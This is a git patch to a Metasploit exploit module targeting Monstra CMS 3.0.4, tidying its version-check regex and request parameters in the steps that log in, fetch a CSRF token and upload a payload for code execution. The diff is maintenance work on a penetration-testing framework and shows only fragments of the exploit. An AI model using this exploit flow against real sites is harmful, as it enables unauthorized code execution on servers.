From 44b9798afbe230bd9004ec87fe1524e82dcd9c4f Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Mon, 9 Jul 2018 10:55:29 -0500
Subject: [PATCH] modified regex, id=filesmanager lines

---
 .../multi/http/monstra_fileupload_exec.rb      | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/multi/http/monstra_fileupload_exec.rb b/modules/exploits/multi/http/monstra_fileupload_exec.rb
index ef1b5159dd..fee19488d9 100644
--- a/modules/exploits/multi/http/monstra_fileupload_exec.rb
+++ b/modules/exploits/multi/http/monstra_fileupload_exec.rb
@@ -69,11 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    if res.body =~ /<\/a> - Version (\d+\.\d+\.\d+)/i
+    if res.body =~ /<\/a>.*?Version (\d+\.\d+\.\d+)/i
       version = Gem::Version.new($1)
       vprint_status("Monstra CMS: #{version}")
 
-      if version == '3.0.4'
+      if version.to_s == '3.0.4'
       return CheckCode::Vulnerable
       else
         return CheckCode::Safe
@@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
         'login' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
-        'login_submit' => 'Log+In',
-      },
+        'login_submit' => 'Log+In'
+      }
     })
     cookies = res.get_cookies
 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(uri, 'admin' '/index.php'),
-      'cookie' => cookies,
+      'cookie' => cookies
     })
     fail_with(Failure::Unreachable, "#{peer} - Did not respond to Login request") if res.nil?
 
@@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # Request for CSRF token for file upload.
     res = send_request_cgi({
       'uri' => normalize_uri(uri, 'admin', '/index.php'),
-      'vars_get' => 'id=filesmanager',
+      'vars_get' => {'id' => 'filesmanager'},
       'method' => 'GET',
-      'cookie' => cookies,
+      'cookie' => cookies
     })
 
     # Grabbing CSRF token from body
@@ -155,12 +155,12 @@ class MetasploitModule < Msf::Exploit::Remote
     # Lets Send Upload request.
     res = send_request_cgi({
       'uri' => normalize_uri(uri, 'admin', '/index.php'),
-      'vars_get' => 'id=filesmanager',
+      'vars_get' => {'id' => 'filesmanager'},
       'method' => 'POST',
       'cookie' => cookies,
       'Connection' => 'close',
       'data' => data,
-      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     })
 
     # Cleanup delete payload after get meterpreter.